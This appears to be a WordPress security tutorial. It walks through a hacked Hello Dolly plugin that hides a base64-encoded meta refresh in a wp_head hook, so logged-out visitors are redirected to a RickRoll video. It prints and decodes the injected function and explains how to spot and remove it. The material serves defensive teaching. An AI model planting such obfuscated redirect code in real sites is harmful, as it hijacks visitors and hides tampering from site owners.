Install and activate the attached plugin.

hello-dolly.zip Download Zip

Expected Outcome Expected Outcome

When activated, if you’re logged in, nothing happens.

Visit your site as a non-logged in user, however, and you’ll be redirected in 5 seconds to a page we all know and love.

Top ↑

How to fix How to fix

When viewing the file /wp-content/plugins/hello.php, there is the following function:

function hello_dolly_singalong() {
if( !is_user_logged_in() ) {
echo base64_decode('PG1ldGEgaHR0cC1lcXVpdj0icmVmcmVzaCIgY29udGVudD0iNTtVUkw9aHR0cDovL3d3dy55b3V0
dWJlLmNvbS93YXRjaD92PW9IZzVTSllSSEEwIj4=');
}
}
add_action('wp_head', 'hello_dolly_singalong');

What does that mean? Well base64_decode() is a huge warning flag for you. No matter what, you should almost never see that in a WordPress theme or plugin. There are a few exceptions, like if you see this, it’s probably okay:

div.image {
width:100px;
height:100px;
background-image:url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAADIA...);
}

That’s using base64 to actually compress and display an image!

But this particular code is probably less so. I like to use Coderstoolbox for this, and you can run the string PG1ldGEgaHR0cC1lcXVpdj0icmVmcmVzaCIgY29udGVudD0iNTtVUkw9aHR0cDovL3d3dy55b3V0
dWJlLmNvbS93YXRjaD92PW9IZzVTSllSSEEwIj4=
through the decoder:

Screen Shot showing string conversion

Voila! Someone’s RickRolling us!

<meta http-equiv="refresh" content="5;URL=http://www.youtube.com/watch?v=oHg5SJYRHA0">

Remove that function and then change all your passwords.